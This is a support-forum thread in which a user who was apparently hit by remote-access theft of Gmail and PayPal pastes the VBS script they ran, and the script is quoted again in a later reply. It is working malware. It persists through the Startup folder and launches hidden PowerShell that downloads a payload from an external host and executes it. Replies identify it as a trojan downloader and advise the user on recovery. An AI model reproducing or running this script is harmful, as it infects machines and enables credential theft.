NotMikaa 0 Posted December 1, 2019 Share Posted December 1, 2019 Hi! So i came about this being dumb and installed it. Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was opened and they were attempting to go into my gmail. They've already looked into my paypal. dim s15001 const CONSOLE_HIDE=0 const CONSOLE_SHOW=1 const CMD_WAIT=true set oShell = wscript.createObject("WScript.Shell") set sysOb = createobject("scripting.filesystemobject") startup = oShell.specialfolders ("startup") & "\update.vbs" sysOb.copyfile wscript.scriptfullname,startup ,true oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT Link to comment Share on other sites More sharing options...
Administrators Marcos 5,074 Posted December 1, 2019 Administrators Share Posted December 1, 2019 A detection was added several days ago, the script is detected as VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script. Link to comment Share on other sites More sharing options...
Most Valued Members Nightowl 202 Posted December 2, 2019 Most Valued Members Share Posted December 2, 2019 (edited) On 12/1/2019 at 7:58 AM, NotMikaa said: Hi! So i came about this being dumb and installed it. Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was opened and they were attempting to go into my gmail. They've already looked into my paypal. dim s15001 const CONSOLE_HIDE=0 const CONSOLE_SHOW=1 const CMD_WAIT=true set oShell = wscript.createObject("WScript.Shell") set sysOb = createobject("scripting.filesystemobject") startup = oShell.specialfolders ("startup") & "\update.vbs" sysOb.copyfile wscript.scriptfullname,startup ,true oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is Put a good password and limit access only to your PCs. Because they have got access to several accounts of yours , you should change all passwords now , and secure them with 2-step verification for more secure entry to your accounts. Edited December 2, 2019 by Rami Link to comment Share on other sites More sharing options...
Recommended Posts